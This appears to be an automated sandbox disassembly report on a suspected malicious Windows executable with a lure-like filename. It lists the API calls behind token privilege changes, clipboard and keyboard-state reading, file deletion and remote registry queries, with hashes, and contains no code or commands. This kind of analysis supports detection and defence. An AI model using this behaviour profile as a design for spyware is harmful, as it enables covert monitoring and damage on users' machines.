                                                              • SetProcessWindowStation.USER32(00000000), ref: 0063ADA5
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0063ADBF
                                                                • Part of subcall function 0063AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0063ACC0), ref: 0063AB99
                                                                • Part of subcall function 0063AB84: CloseHandle.KERNEL32(?,?,0063ACC0), ref: 0063ABAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $H*k$default$winsta0
                                                              • API String ID: 2063423040-2511175496
                                                              • Opcode ID: ce3d9098760373979f6c5a711b66d440b59d476429bda3409b2e6bf4bc507dc0
                                                              • Instruction ID: 5282d15ec80a602fc5e1d226c63c5c9867e6ce96a13330ecc1b78cae556e708e
                                                              • Opcode Fuzzy Hash: ce3d9098760373979f6c5a711b66d440b59d476429bda3409b2e6bf4bc507dc0
                                                              • Instruction Fuzzy Hash: A6816BB1900209BFDF119FE4DC49AEEBBBAEF04304F04411DF965A62A1D7318E55EBA1
                                                              APIs
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00645FA6,?), ref: 00646ED8
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00645FA6,?), ref: 00646EF1
                                                                • Part of subcall function 0064725E: __wsplitpath.LIBCMT ref: 0064727B
                                                                • Part of subcall function 0064725E: __wsplitpath.LIBCMT ref: 0064728E
                                                                • Part of subcall function 006472CB: GetFileAttributesW.KERNEL32(?,00646019), ref: 006472CC
                                                              • _wcscat.LIBCMT ref: 00646149
                                                              • _wcscat.LIBCMT ref: 00646167
                                                              • __wsplitpath.LIBCMT ref: 0064618E
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 006461A4
                                                              • _wcscpy.LIBCMT ref: 00646209
                                                              • _wcscat.LIBCMT ref: 0064621C
                                                              • _wcscat.LIBCMT ref: 0064622F
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0064625D
                                                              • DeleteFileW.KERNEL32(?), ref: 0064626E
                                                              • MoveFileW.KERNEL32(?,?), ref: 00646289
                                                              • MoveFileW.KERNEL32(?,?), ref: 00646298
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 006462AD
                                                              • DeleteFileW.KERNEL32(?), ref: 006462BE
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 006462E1
                                                              • FindClose.KERNEL32(00000000), ref: 006462FD
                                                              • FindClose.KERNEL32(00000000), ref: 0064630B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 1917200108-1173974218
                                                              • Opcode ID: 1235da37dcb70117ec32ae8571a6f45725a0d9ed2558d67a7ad65e8b79bfc061
                                                              • Instruction ID: 3bad8d66e8d34353e1327e6f39d965856adfcef3411a299584c711dbf3730321
                                                              • Opcode Fuzzy Hash: 1235da37dcb70117ec32ae8571a6f45725a0d9ed2558d67a7ad65e8b79bfc061
                                                              • Instruction Fuzzy Hash: CE5120B290812C6ACB21EB95DC44DDF77BDAF06300F0501EAF585E3141DE769B498FA9
                                                              APIs
                                                              • OpenClipboard.USER32(0069DC00), ref: 00656B36
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00656B44
                                                              • GetClipboardData.USER32(0000000D), ref: 00656B4C
                                                              • CloseClipboard.USER32 ref: 00656B58
                                                              • GlobalLock.KERNEL32(00000000), ref: 00656B74
                                                              • CloseClipboard.USER32 ref: 00656B7E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00656B93
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00656BA0
                                                              • GetClipboardData.USER32(00000001), ref: 00656BA8
                                                              • GlobalLock.KERNEL32(00000000), ref: 00656BB5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00656BE9
                                                              • CloseClipboard.USER32 ref: 00656CF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              • Opcode ID: 8e33c39d1f3641810c7dd2117729cb0a1fce3fdb2b8e8854c94237cdad395cf7
                                                              • Instruction ID: 610561f03dbfa2adfc485d97e448b8853105f88dcaf5348a8aa768dfaabb0b84
                                                              • Opcode Fuzzy Hash: 8e33c39d1f3641810c7dd2117729cb0a1fce3fdb2b8e8854c94237cdad395cf7
                                                              • Instruction Fuzzy Hash: 3B51B171240205ABD344AF60CD56F6F77AAAF54B12F40022DFA46D72D1EF70D909CB66
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0064F62B
                                                              • FindClose.KERNEL32(00000000), ref: 0064F67F
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064F6A4
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064F6BB
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0064F6E2
                                                              • __swprintf.LIBCMT ref: 0064F72E
                                                              • __swprintf.LIBCMT ref: 0064F767
                                                              • __swprintf.LIBCMT ref: 0064F7BB
                                                                • Part of subcall function 0062172B: __woutput_l.LIBCMT ref: 00621784
                                                              • __swprintf.LIBCMT ref: 0064F809
                                                              • __swprintf.LIBCMT ref: 0064F858
                                                              • __swprintf.LIBCMT ref: 0064F8A7
                                                              • __swprintf.LIBCMT ref: 0064F8F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 835046349-2428617273
                                                              • Opcode ID: 04556bbcda59cb8560e623c9a0cfe6c0ed6ac227adb2ebc3520c6550bd27ffb1
                                                              • Instruction ID: 12f0960e06960874a645eaf1132fda9be80e8ff63b041b5337ac30ffd063231d
                                                              • Opcode Fuzzy Hash: 04556bbcda59cb8560e623c9a0cfe6c0ed6ac227adb2ebc3520c6550bd27ffb1
                                                              • Instruction Fuzzy Hash: A6A131B2408344ABC354EBA4C895DAFB7EEAF98700F440D2DF585C6192EB34D949CB66
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00651B50
                                                              • _wcscmp.LIBCMT ref: 00651B65
                                                              • _wcscmp.LIBCMT ref: 00651B7C
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00651B8E
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00651BA8
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00651BC0
                                                              • FindClose.KERNEL32(00000000), ref: 00651BCB
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00651BE7
                                                              • _wcscmp.LIBCMT ref: 00651C0E
                                                              • _wcscmp.LIBCMT ref: 00651C25
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00651C37
                                                              • SetCurrentDirectoryW.KERNEL32(006B39FC), ref: 00651C55
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00651C5F
                                                              • FindClose.KERNEL32(00000000), ref: 00651C6C
                                                              • FindClose.KERNEL32(00000000), ref: 00651C7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 9837af177f3e60b0886c3f795d933446a1fcb5799e3b28182b8dfef3d6248af4
                                                              • Instruction ID: 45624721eefbc02d66ffc2e8f86db8e54717dc43afdef1e4e0575ed06ca40f8c
                                                              • Opcode Fuzzy Hash: 9837af177f3e60b0886c3f795d933446a1fcb5799e3b28182b8dfef3d6248af4
                                                              • Instruction Fuzzy Hash: BC31D5726002197BCF10ABA0DC89BDE77AE9F06321F100196FD11E61D0EB75DB898B64
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00651CAB
                                                              • _wcscmp.LIBCMT ref: 00651CC0
                                                              • _wcscmp.LIBCMT ref: 00651CD7
                                                                • Part of subcall function 00646BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00646BEF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00651D06
                                                              • FindClose.KERNEL32(00000000), ref: 00651D11
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00651D2D
                                                              • _wcscmp.LIBCMT ref: 00651D54
                                                              • _wcscmp.LIBCMT ref: 00651D6B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00651D7D
                                                              • SetCurrentDirectoryW.KERNEL32(006B39FC), ref: 00651D9B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00651DA5
                                                              • FindClose.KERNEL32(00000000), ref: 00651DB2
                                                              • FindClose.KERNEL32(00000000), ref: 00651DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: c56784aa0138b4b380bfb2fd3072a54605b42ff71d6a6f8c70e85339749522f0
                                                              • Instruction ID: 72a513827432829f61973913a95b6a12f147cdb59e530dc4d61da38740f4f6eb
                                                              • Opcode Fuzzy Hash: c56784aa0138b4b380bfb2fd3072a54605b42ff71d6a6f8c70e85339749522f0
                                                              • Instruction Fuzzy Hash: D231B27250061A7ACF10ABA0EC49BEE77BF9F46325F100695FC11A62D0DB74DA898F64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                              • API String ID: 2102423945-2023335898
                                                              • Opcode ID: 2dcdc83916a80541c5b62e566aa5d6deef8a1c11eaec8eaf91f85cfc27ed899e
                                                              • Instruction ID: c53340ed93a8ac7fb6aa6fd8ad029b22ec53d226af1c3c2dc01ccc8fc695dc61
                                                              • Opcode Fuzzy Hash: 2dcdc83916a80541c5b62e566aa5d6deef8a1c11eaec8eaf91f85cfc27ed899e
                                                              • Instruction Fuzzy Hash: 27829271D44219DFDB28CF98C880AEEB7B2FF44310F258169D859AB391E774AD85CB90
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 006509DF
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 006509EF
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006509FB
                                                              • __wsplitpath.LIBCMT ref: 00650A59
                                                              • _wcscat.LIBCMT ref: 00650A71
                                                              • _wcscat.LIBCMT ref: 00650A83
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00650A98
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650AAC
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650ADE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650AFF
                                                              • _wcscpy.LIBCMT ref: 00650B0B
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00650B4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: 8e528933c12a8cfa91efb48cd529417825e76a7708b424ad3440b2c6114c0a7f
                                                              • Instruction ID: c6d4805566d01a1662bf39486717d641ddf222c826cabba9c4c89b4e545a5f2d
                                                              • Opcode Fuzzy Hash: 8e528933c12a8cfa91efb48cd529417825e76a7708b424ad3440b2c6114c0a7f
                                                              • Instruction Fuzzy Hash: F06149B2504305AFD750EF60C88599EB3EAFF89310F04491EF98987252DB31EA49CB96
                                                              APIs
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0063ABD7
                                                                • Part of subcall function 0063ABBB: GetLastError.KERNEL32(?,0063A69F,?,?,?), ref: 0063ABE1
                                                                • Part of subcall function 0063ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0063A69F,?,?,?), ref: 0063ABF0
                                                                • Part of subcall function 0063ABBB: HeapAlloc.KERNEL32(00000000,?,0063A69F,?,?,?), ref: 0063ABF7
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0063AC0E
                                                                • Part of subcall function 0063AC56: GetProcessHeap.KERNEL32(00000008,0063A6B5,00000000,00000000,?,0063A6B5,?), ref: 0063AC62
                                                                • Part of subcall function 0063AC56: HeapAlloc.KERNEL32(00000000,?,0063A6B5,?), ref: 0063AC69
                                                                • Part of subcall function 0063AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0063A6B5,?), ref: 0063AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0063A6D0
                                                              • _memset.LIBCMT ref: 0063A6E5
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0063A704
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A715
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0063A752
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0063A76E
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A78B
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0063A79A
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0063A7A1
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0063A7C2
                                                              • CopySid.ADVAPI32(00000000), ref: 0063A7C9
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0063A7FA
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0063A820
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0063A834
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: b8c07dca582ca2336a50350d1d084dab6606d584d56dfe7a9e5345847799a4e1
                                                              • Instruction ID: 02bd7c2289327c79cb125b32ed982c0142cbb1edc192cecb801f7a80ae0328d9
                                                              • Opcode Fuzzy Hash: b8c07dca582ca2336a50350d1d084dab6606d584d56dfe7a9e5345847799a4e1
                                                              • Instruction Fuzzy Hash: D7514C71900209BBDF10DFA5DC85EEEBBBAFF04300F048129F951AB291DB359A05DBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: j$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$jjj j
                                                              • API String ID: 0-196589705
                                                              • Opcode ID: 15cada82bc8e8ea18143dce21359a0a9654275325aef59d2de07942b40822571
                                                              • Instruction ID: 879aafb33ed01bc6df9ea423aea20bc83fc2787f3b523619e5b2aae9a13a263e
                                                              • Opcode Fuzzy Hash: 15cada82bc8e8ea18143dce21359a0a9654275325aef59d2de07942b40822571
                                                              • Instruction Fuzzy Hash: 06728171E4422ACBDB28DF58C8507EEB7B6BF44710F14816AE845EB381DB709E81CB94
                                                              APIs
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00645FA6,?), ref: 00646ED8
                                                                • Part of subcall function 006472CB: GetFileAttributesW.KERNEL32(?,00646019), ref: 006472CC
                                                              • _wcscat.LIBCMT ref: 00646441
                                                              • __wsplitpath.LIBCMT ref: 0064645F
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00646474
                                                              • _wcscpy.LIBCMT ref: 006464A3
                                                              • _wcscat.LIBCMT ref: 006464B8
                                                              • _wcscat.LIBCMT ref: 006464CA
                                                              • DeleteFileW.KERNEL32(?), ref: 006464DA
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 006464EB
                                                              • FindClose.KERNEL32(00000000), ref: 00646506
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                              • String ID: \*.*
                                                              • API String ID: 2643075503-1173974218
                                                              • Opcode ID: 10237f61f86de603e80fcb9c2c1fa74ffb4f9b05aaf46ad9d8723e25bc25794e
                                                              • Instruction ID: 5f041071265a5f792b1fd9856b246325622a687b9ebf061edf712bcd5305610f
                                                              • Opcode Fuzzy Hash: 10237f61f86de603e80fcb9c2c1fa74ffb4f9b05aaf46ad9d8723e25bc25794e
                                                              • Instruction Fuzzy Hash: 593186B2408384AAC721DBA4C885DDB77DDAF56310F44492EF5D8C3142EA35D50987A7
                                                              APIs
                                                                • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0066328E
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0066332D
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006633C5
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00663604
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00663611
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: a6e19c7ab1daf79c4ea4d81a040e4ceddf494f849200b19ee3135716d94c2669
                                                              • Instruction ID: 1f8938ab79b45d0dedbedebaa8c401540fab42815551de4a6266228a7b08caf2
                                                              • Opcode Fuzzy Hash: a6e19c7ab1daf79c4ea4d81a040e4ceddf494f849200b19ee3135716d94c2669
                                                              • Instruction Fuzzy Hash: EBE14A71604210AFCB55DF28C991E6BBBEAEF88314B04856DF44ADB3A1DB30EE05CB55
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00642B5F
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00642BE0
                                                              • GetKeyState.USER32(000000A0), ref: 00642BFB
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00642C15
                                                              • GetKeyState.USER32(000000A1), ref: 00642C2A
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00642C42
                                                              • GetKeyState.USER32(00000011), ref: 00642C54
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00642C6C
                                                              • GetKeyState.USER32(00000012), ref: 00642C7E
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00642C96
                                                              • GetKeyState.USER32(0000005B), ref: 00642CA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
